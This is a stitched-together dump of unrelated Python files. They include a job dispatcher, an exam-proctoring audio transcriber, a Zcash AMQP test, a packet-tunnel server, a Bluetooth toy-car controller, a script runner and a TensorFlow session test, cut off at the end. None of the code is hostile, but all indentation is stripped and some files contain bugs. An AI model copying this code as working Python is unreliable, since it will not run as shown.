Initialize min(num_threads, number of jobs to reproduce) threads.
"""
self.lock = Lock()
self.workspace_locks = self.manager.dict()
self.cloned_repos = self.manager.dict()
self.threads = {}
self.terminate.value = 0
num_remaining_items = self.job_center.get_num_remaining_items(self.package_mode)
if not num_remaining_items:
log.info('No remaining items. Exiting.')
return 0
self.thread_num = min(self.thread_num, num_remaining_items)
self.job_center.init_queues_for_threads(self.thread_num, self.package_mode)
# Begin initializing threads.
for tid in range(self.thread_num):
self._spawn(tid)
self._thread_watcher()
def _thread_main(self, tid):
"""
This is the target function for each thread.
It receives the work load (a queue) for a given thread from job_center.thread_workloads.
For each item, it calls self.process_item() to run.
:param tid: Thread ID
"""
workload = self.job_center.thread_workloads[tid]
while not workload.empty():
# Break out of the loop if the terminate flag is set.
if self.terminate.value:
return 0
item = workload.get()
# Intentionally catch ReproduceError but allow KeyboardInterrupt to propagate.
try:
self.process_item(item, tid)
except ReproduceError as e:
log.info(colored('[THREAD {}] {} {}'.format(tid, item, e), 'red'))
self.reproduce_err.value += 1
self.record_error_reason(item, str(e))
# Optionally handle failed reproducing here.
log.info('[THREAD {}] Workload complete. Exiting thread.'.format(tid))
def _base_pre_run(self):
if self.job_center.total_jobs < 1:
log.info('No jobs to reproduce. Exiting.')
return
# Set up the required directories.
os.makedirs(self.config.orig_logs_dir, exist_ok=True)
os.makedirs(self.config.output_dir, exist_ok=True)
self.utils.directories_setup()
if os.path.isfile(self.utils.get_error_reason_file_path()):
self.error_reasons = read_json(self.utils.get_error_reason_file_path())
self.error_reasons = self.manager.dict(self.error_reasons)
# Check if commands to Travis work.
if not Utils.is_travis_installed():
log.error(colored('Commands to Travis are failing unexpectedly. Try restarting your shell and ensure your '
'environment is provisioned correctly. Also try restarting your shell.', 'red'))
raise Exception('Unexpected state: Commands to Travis are failing unexpectedly.')
# Read travis_images.json.
try:
self.travis_images = read_json(self.config.travis_images_json)
except FileNotFoundError:
log.error(colored(self.config.travis_images_json + ' not found. Exiting.', 'red'))
raise
def pre_run(self):
"""
Called before any items have been processed.
Overriding is optional. Defaults to no-op.
"""
pass
def progress_str(self) -> Optional[str]:
"""
Subclasses should return a string, which will be logged, representing progress at the time the method is called.
Returns None by default, which indicates to the caller that logging the progress should be skipped.
Overriding is optional.
:return: A string representing the dispatcher's progress or None to skip logging the progress.
"""
return None
def update_local_files(self):
"""
Called periodically to allow the dispatcher to update local files as needed.
Overriding is optional. Defaults to no-op.
"""
pass
def process_item(self, item, tid):
"""
Subclasses must override this method to process each item in the workload.
:param item: The item to process.
:param tid: The thread ID tasked with processing the item.
"""
raise NotImplementedError
def record_error_reason(self, item, message):
"""
Overriding is optional. Defaults to no-op.
:param item: The item for which to record an error message.
:param message: The error message to record.
"""
pass
def post_run(self):
"""
Called after all items have been processed.
Overriding is optional. Defaults to no-op.
"""
pass
|
audio_part.py
|
import speech_recognition as sr
import pyaudio
import wave
import time
import threading
import os
def read_audio(stream, filename):
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100 # Record at 44100 samples per second
seconds = 10 # Number of seconds to record at once
filename = filename
frames = [] # Initialize array to store frames
for i in range(0, int(fs / chunk * seconds)):
data = stream.read(chunk)
frames.append(data)
# Save the recorded data as a WAV file
wf = wave.open(filename, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(p.get_sample_size(sample_format))
wf.setframerate(fs)
wf.writeframes(b''.join(frames))
wf.close()
# Stop and close the stream
stream.stop_stream()
stream.close()
def convert(i):
if i >= 0:
sound = 'record' + str(i) +'.wav'
r = sr.Recognizer()
with sr.AudioFile(sound) as source:
r.adjust_for_ambient_noise(source)
print("Converting Audio To Text and saving to file..... ")
audio = r.listen(source)
try:
value = r.recognize_google(audio) ##### API call to google for speech recognition
os.remove(sound)
if str is bytes:
result = u"{}".format(value).encode("utf-8")
else:
result = "{}".format(value)
with open("test.txt","a") as f:
f.write(result)
f.write(" ")
f.close()
except sr.UnknownValueError:
print("")
except sr.RequestError as e:
print("{0}".format(e))
except KeyboardInterrupt:
pass
p = pyaudio.PyAudio() # Create an interface to PortAudio
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100
def save_audios(i):
stream = p.open(format=sample_format,channels=channels,rate=fs,
frames_per_buffer=chunk,input=True)
filename = 'record'+str(i)+'.wav'
read_audio(stream, filename)
for i in range(30//10): # Number of total seconds to record/ Number of seconds per recording
t1 = threading.Thread(target=save_audios, args=[i])
x = i-1
t2 = threading.Thread(target=convert, args=[x]) # send one earlier than being recorded
t1.start()
t2.start()
t1.join()
t2.join()
if i==2:
flag = True
if flag:
convert(i)
p.terminate()
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
file = open("test.txt") ## Student speech file
data = file.read()
file.close()
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(data) ######### tokenizing sentence
filtered_sentence = [w for w in word_tokens if not w in stop_words]
filtered_sentence = []
for w in word_tokens: ####### Removing stop words
if w not in stop_words:
filtered_sentence.append(w)
####### creating a final file
f=open('final.txt','w')
for ele in filtered_sentence:
f.write(ele+' ')
f.close()
##### checking whether proctor needs to be alerted or not
file = open("paper.txt") ## Question file
data = file.read()
file.close()
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(data) ######### tokenizing sentence
filtered_questions = [w for w in word_tokens if not w in stop_words]
filtered_questions = []
for w in word_tokens: ####### Removing stop words
if w not in stop_words:
filtered_questions.append(w)
def common_member(a, b):
a_set = set(a)
b_set = set(b)
# check length
if len(a_set.intersection(b_set)) > 0:
return(a_set.intersection(b_set))
else:
return([])
comm = common_member(filtered_questions, filtered_sentence)
print('Number of common elements:', len(comm))
print(comm)
|
proton_test.py
|
#!/usr/bin/env python
# Copyright (c) 2017-2020 The Zcash developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://www.opensource.org/licenses/mit-license.php.
#
# Test Proton interface (provides AMQP 1.0 messaging support).
#
# Requirements:
# Python library for Qpid Proton:
# https://pypi.python.org/pypi/python-qpid-proton
# To install:
# pip install python-qpid-proton
#
import sys; assert sys.version_info < (3,), ur"This script does not run under Python 3. Please use Python 2.7.x."
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, bytes_to_hex_str, \
start_nodes
from proton.handlers import MessagingHandler
from proton.reactor import Container
import threading
class Server(MessagingHandler):
def __init__(self, url, limit):
super(Server, self).__init__()
self.url = url
self.counter = limit
self.blockhashes = []
self.txids = []
self.blockseq = -1
self.txidseq = -1
def on_start(self, event):
print "Proton listening on:", self.url
self.container = event.container
self.acceptor = event.container.listen(self.url)
def on_message(self, event):
m = event.message
hash = bytes_to_hex_str(m.body)
sequence = m.properties['x-opt-sequence-number']
if m.subject == "hashtx":
self.txids.append(hash)
# Test that sequence id is incrementing
assert(sequence == 1 + self.txidseq)
self.txidseq = sequence
elif m.subject == "hashblock":
self.blockhashes.append(hash)
# Test that sequence id is incrementing
assert(sequence == 1 + self.blockseq)
self.blockseq = sequence
self.counter = self.counter - 1
if self.counter == 0:
self.container.stop()
class ProtonTest (BitcoinTestFramework):
port = 25672
numblocks = 10 # must be even, as two nodes generate equal number
assert(numblocks % 2 == 0)
def setup_nodes(self):
# Launch proton server in background thread
# It terminates after receiving numblocks * 2 messages (one for coinbase, one for block)
self.server = Server("127.0.0.1:%i" % self.port, self.numblocks * 2)
self.container = Container(self.server)
self.t1 = threading.Thread(target=self.container.run)
self.t1.start()
return start_nodes(4, self.options.tmpdir, extra_args=[
['-experimentalfeatures', '-debug=amqp', '-amqppubhashtx=amqp://127.0.0.1:'+str(self.port),
'-amqppubhashblock=amqp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
baseheight = self.nodes[0].getblockcount() # 200 blocks already mined
# generate some blocks
self.nodes[0].generate(self.numblocks/2)
self.sync_all()
self.nodes[1].generate(self.numblocks/2)
self.sync_all()
# wait for server to finish
self.t1.join()
# sequence numbers have already been checked in the server's message handler
# sanity check that we have the right number of block hashes and coinbase txids
assert_equal(len(self.server.blockhashes), self.numblocks)
assert_equal(len(self.server.txids), self.numblocks)
# verify that each block has the correct coinbase txid
for i in xrange(0, self.numblocks):
height = baseheight + i + 1
blockhash = self.nodes[0].getblockhash(height)
assert_equal(blockhash, self.server.blockhashes[i])
resp = self.nodes[0].getblock(blockhash)
coinbase = resp["tx"][0]
assert_equal(coinbase, self.server.txids[i])
if __name__ == '__main__':
ProtonTest().main()
|
tun_server2.py
|
#!/usr/bin/env python3
#coding=utf-8
ADDR = ''
PORT = 6789
READ_BUF = 4096
IP_PKG_FORWARD_SIZE = 128
import socket
from time import ctime,time
from queue import Queue
from struct import pack,unpack
from threading import Thread
from selectors import DefaultSelector,EVENT_READ,EVENT_WRITE
from multiprocessing import Process,Pipe
sock_dict={}
unuse_ip=[ '172.16.10.'+str(x) for x in range(1,255) ]
use_ip=[]
pkg_recv = Queue(IP_PKG_FORWARD_SIZE)
pkg_forward = Queue(IP_PKG_FORWARD_SIZE)
selector = DefaultSelector()
def add_virtual_net(Sock):
add_ip = unuse_ip.pop(0)
sock_dict[add_ip] = Sock
Sock.conn.send(socket.inet_aton(add_ip))
use_ip.append(add_ip)
selector.register(Sock.conn,EVENT_READ)
re_code = Sock.conn.recv(READ_BUF)
if re_code == b'ok':
return 'ok'
else:
return 'err'
class SockRecvQueue:
'''socket 接收队列'''
cache = b''
def __init__(self,conn):
self.conn=conn
def recv_pkg(self):
sock = self.conn
cache = self.cache
def Recv():
nonlocal cache
cache += sock.recv(READ_BUF)
if cache == b'':
return 'server exit!'
while True:
if cache == b'':
re_code = Recv()
if re_code == 'server exit!':
return 'err'
length = unpack('!H',cache[0:2])[0]
data = cache[0:2]
if cache ==b'':
Recv()
#print('data length ',length)
if length <= len(cache):
data += cache[0:length]
cache = cache[length:]
#osock.write(fd,data)
return data
else:
while length > len(cache):
Recv()
data += cache[0:length]
cache = cache[length:]
#osock.write(fd,data)
return data
def recv_select():
event_list = selector.select()
for key, event in event_list:
conn = key.fileobj
if event == EVENT_READ:
print('recv_select() event 是读取事件')
pkg = recv_pkg(conn)
print('recv_pkg() ... done')
if pkg != 'err':
pkg_recv.put(pkg)
else:
selector.unregister(conn)
print('recv_pkg() --> err')
else:
pass
def ip_pkg_forward():
pkg = pkg_recv.get()
print('收到 pkg 包')
src,dst = pkg[12:16] ,pkg[16:20] # 源地址 ,目的地址
if dst in sock_dict: ### and src in sock_dict:
sock_dict[dst].conn.send(pkg)
else:
print('目的{}不可达'.format(socket.inet_ntoa(dst)))
'''
def LAN_forward(sock)
selector = DefaultSelector()
selector.register(sock,EVENT_READ)
cache = b'' # recv_pkg() 缓存
while True:
event_list = selector.select()
for key , event in event_list:
conn = key.fileobj
if event == EVENT_READ:
data = recv_pkg(sock)
elif event == EVENT_WRITE:
pass
else:
pass
'''
def work():
server_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
server_sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,True)
server_sock.bind((ADDR,PORT))
server_sock.listen(128)
#selector = selectors.DefaultSelector()
#selector.register(server_sock,selectors.EVENT_READ)
pkg_recv_th = Thread(target=recv_select)
pkg_recv_th.start()
ip_pkg_forward_th = Thread(target=ip_pkg_forward)
ip_pkg_forward_th.start()
while True:
sock, addr = server_sock.accept()
print('{} : {}:{} 已连接'.format(ctime(),*addr))
add_virtual_net(sock)
work()
|
comms.py
|
import select
import threading
import time
import csv
from bluetooth import *
from constants import *
msgHeader = "[CAR COMMS]: "
BT_LOOP_SLEEP = 25
def read_cars_csv():
file = csv.DictReader(open(os.path.join(ZENWHEELS_DIR, 'cars.csv')))
cars = []
for row in file:
cars.append(row)
return cars
class CarCommunicator():
def __init__(self):
self.cars_info = read_cars_csv()
self.active_vehicles = None
self.car_sockets = {}
def connectToCars(self, vehicles):
print(msgHeader + "Connecting to the ZenWheels cars...")
self.active_vehicles = vehicles
for vehicle in self.active_vehicles:
car_id = vehicle.owner.ID
if car_id in self.car_sockets.keys() and self.car_sockets[car_id] != None:
print(msgHeader + "Already connected to " + car_id + ".")
continue
mac_address = None
for car in self.cars_info:
if car["Bluetooth SSID"] == car_id:
mac_address = car["MAC Address"]
break
if mac_address is None:
print(msgHeader + "Could not find a record for " + car_id + ".")
return False
# Try to connect to each car three times
connected = False
for attempt in range(1, 4):
try:
print(msgHeader + "Connecting to %s (Attempt %d)." % (car_id, attempt))
socket = BluetoothSocket(RFCOMM)
socket.connect((mac_address, 1))
self.car_sockets[car_id] = socket
print(msgHeader + "Connected to %s." % car_id)
connected = True
break
except (BluetoothError, OSError) as e:
print(msgHeader + "Could not connect to %s because %s." % (car_id, e))
if connected == False:
print(msgHeader + "All connection attempts to %s failed." % (car_id))
return False
self.startCarComms()
return True
def startCarComms(self):
t_process = threading.Thread(target=self.bt_send)
t_process.daemon = True
t_process.start()
def bt_send(self):
while True:
for vehicle in self.active_vehicles:
socket = self.car_sockets[vehicle.owner.ID]
if socket is None: continue # Connection to this car was lost.
try:
can_read, can_write, has_error = select.select([], [socket], [], 0)
if socket in can_write:
try:
if not vehicle.command_queue:
continue
command = vehicle.command_queue.popitem()
socket.send(command[0])
except Exception as e:
print(msgHeader + str(e))
pass
except (BluetoothError, OSError, ValueError) as e:
print(msgHeader + str(e))
socket.close()
self.car_sockets[vehicle.owner.ID] = None
# Ray: Sleep is essential otherwise all system resources are taken and total system delay skyrockets.
time.sleep(BT_LOOP_SLEEP / 1000)
|
auto_run_script.py
|
from runpy import run_path
from tkinter import *
import multiprocessing
import os
def make_app():
app = Tk()
Label(app, text='Available script for run', font=('Hack', 20, 'bold')).pack()
Listbox(app, name='listb', bg='#FFF68F',fg='Aquamarine').pack(fill=BOTH, expand=True)
# Listbox(name='listb').pack()
Button(text='start', command=run_script).pack()
Button(text='stop', command=stop_script).pack()
app.geometry('400x400')
return app
def ui_make_list():
listb = app.children['listb']
for d in os.listdir():
listb.insert(END, d)
def run_script():
listb = app.children['listb']
s_path = listb.get(ACTIVE)
p = multiprocessing.Process(name='print', target=run_path, args=(s_path,))
p.start()
def stop_script():
for p in multiprocessing.active_children():
if p.name == 'print':
p.terminate()
def watcher():
print(multiprocessing.active_children())
listb = app.children['listb']
s_path = listb.get(ACTIVE)
print(s_path)
app.after(1000, watcher)
if __name__ == '__main__':
app = make_app()
app.after(100, ui_make_list)
app.after(0, watcher)
app.mainloop()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
ops._USE_C_API = True
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
@test_util.disable_c_api # No shape registration for 'ConstructionFails'
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
@test_util.disable_c_api # session.make_callable() doesn't work with C API
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
{'a': a.name, 'c': c, 'b': b}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
{'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(DEFG(d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({'d': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {'a': a.name, 'c': c, 'b': b}})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
